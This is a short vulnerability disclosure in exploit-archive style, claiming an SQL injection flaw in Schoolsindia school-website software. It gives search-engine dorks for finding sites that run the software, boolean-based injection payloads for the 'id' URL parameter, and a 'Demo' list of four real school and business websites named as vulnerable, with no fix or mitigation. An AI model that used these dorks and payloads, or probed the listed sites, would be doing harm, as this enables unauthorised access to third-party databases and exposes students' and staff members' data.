[+] Title: Schoolsindia SQL Injection
[+] Author: h4shur
[+] date:2021-05-18
[+] Vendor Homepage: https://www.schoolsindia.com/
[+] Software Link: https://www.schoolsindia.com/
[+] Tested on: Windows 10 & Google Chrome
[+] Category : Web Application Bugs
[+} Dork : intext:"Powered by Schoolsindia"
intext:"Powered by Schoolsindia" inurl:"gallery.php?id="
### Note:
[+] Add the quotation mark (') to the end of the link :
* Target.com/news.php?ID=4'
[+] First add "and 1=1" and then "and 1=2" to the end of the link :
* Target.com/news.php?ID=4 and 1=1
* Target.com/news.php?ID=4 and 1=2
### Demo:
[+] https://dpsmbd.com/gallery.php?id=66
[+] http://pbvmsocietyperambur.org/gallery.php?id=2
[+] http://dreamskitchen.co.in/gallery.php?id=1
[+] https://www.delhijainschool.com/gallery.php?id=15
### Contact Me :
* Email : h4shursec@gmail.com
* twitter : @h4shur
* Telegram : @h4shur
* Instagram : @h4shur